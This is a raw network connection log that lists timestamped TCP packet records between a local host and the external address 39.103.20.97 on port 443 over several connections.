Jan 1, 2025 08:30:38.339909077 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.340075016 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.340079069 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.677882910 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.677901983 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.677984953 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.677995920 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.678056955 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.678272963 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.678339958 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.679708004 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.679776907 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.683409929 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.683470964 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.770344973 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.770384073 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.770412922 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.770446062 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.770467997 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.770494938 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.770737886 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.770802021 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.771493912 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.771524906 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.771550894 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.771559000 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.771575928 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.771744967 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.772566080 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.772619963 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.773987055 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.774019957 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.774043083 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.774050951 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.774068117 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.774100065 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.775770903 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.775829077 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.862581968 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.862637043 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.862778902 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.862792969 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.862910032 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863008022 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863061905 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863198996 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863251925 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863595963 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863651037 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863668919 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863678932 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863702059 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863769054 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.863821030 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.863828897 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.864061117 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.864429951 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.864481926 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.864491940 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.864536047 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.864547968 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.864553928 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.864583969 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.864599943 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.865359068 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.865389109 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.865416050 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.865423918 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.865451097 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.865472078 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.865868092 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.865931034 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.866383076 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.866437912 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.868108034 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.868159056 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.868258953 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.868310928 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.955393076 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.955462933 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.955488920 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.955498934 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.955527067 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.955534935 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.955549002 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.955580950 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.956192017 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.956207037 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.994524002 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.994564056 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.994640112 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.995090961 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.995100975 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.211699009 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.213263988 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.213699102 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.213716030 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.217148066 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.217154026 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.539719105 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.539741993 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.539809942 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.539830923 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540246964 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540272951 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540301085 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.540307999 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540323973 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.540345907 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.540844917 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540900946 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.540945053 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.559273958 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.559294939 CET	443	49739	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.559304953 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.559932947 CET	49739	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.613121033 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.613164902 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:40.613234043 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.613648891 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:40.613661051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:41.870527983 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:41.870937109 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:41.871248007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:41.871257067 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:41.871434927 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:41.871439934 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204008102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204027891 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204056025 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.204076052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204092979 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.204112053 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.204324007 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204369068 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.204924107 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.204963923 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.434087992 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.434168100 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.434415102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.434462070 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.434705973 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.434763908 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.435609102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.435640097 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.435663939 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.435673952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.435693979 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.435714006 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.436388016 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.436439037 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.437179089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.437226057 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.649024010 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.649063110 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.649106026 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.649118900 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.649339914 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.649339914 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651427031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651478052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651488066 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651493073 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651510954 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651519060 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651537895 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651540995 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651551008 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651568890 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651587009 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651598930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651603937 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.651629925 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651648045 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.651987076 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.652028084 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.652039051 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.652043104 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.652081013 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.652090073 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.652942896 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.652982950 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.653002977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.653007984 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.653029919 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.653049946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.653877020 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.653907061 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.653932095 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.653937101 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.653964996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.653975964 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.654757977 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.654824018 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866408110 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866471052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866492987 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866506100 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866518974 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866563082 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866704941 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866704941 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866704941 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866714001 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866755962 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866792917 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866838932 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866913080 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.866965055 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.866983891 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867029905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867141962 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867187977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867336035 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867367029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867378950 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867383003 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867404938 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867418051 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867799997 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867835999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867861986 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867866039 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867873907 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867892027 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867908001 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867913008 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867918968 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867950916 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867955923 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867960930 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867980003 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.867994070 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.867997885 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.868021965 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.868036032 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871325970 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871357918 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871385098 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871392012 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871419907 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871433973 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871454954 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871490002 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871504068 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871507883 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871553898 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871577024 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.871898890 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.871953964 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872047901 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872080088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872103930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872108936 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872117996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872155905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872308969 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872339964 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872364044 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872369051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.872394085 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.872410059 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.958919048 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.958956957 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.958991051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.958997011 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.959007025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.959018946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.959028959 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.959033966 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.959057093 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.959062099 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:42.959073067 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:42.959096909 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095643044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095681906 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095710039 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095738888 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095817089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095823050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095823050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095823050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095823050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095838070 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095860958 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095874071 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.095944881 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.095990896 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096038103 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096067905 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096081972 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096086025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096113920 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096113920 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096214056 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096254110 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096399069 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096431017 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096441984 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096445084 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096461058 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096462965 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096502066 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096503973 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096512079 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096539974 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096548080 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096551895 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096580982 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096594095 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096739054 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096786022 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096892118 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096929073 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096937895 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096946955 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.096966028 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.096990108 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097035885 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097069025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097080946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097084999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097107887 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097115040 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097136021 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097141981 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097157001 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097464085 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097495079 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097505093 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097511053 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097523928 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097541094 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097551107 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097554922 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097563982 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097569942 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097592115 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097595930 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097604990 CET	49740	443	192.168.2.4	39.103.20.97
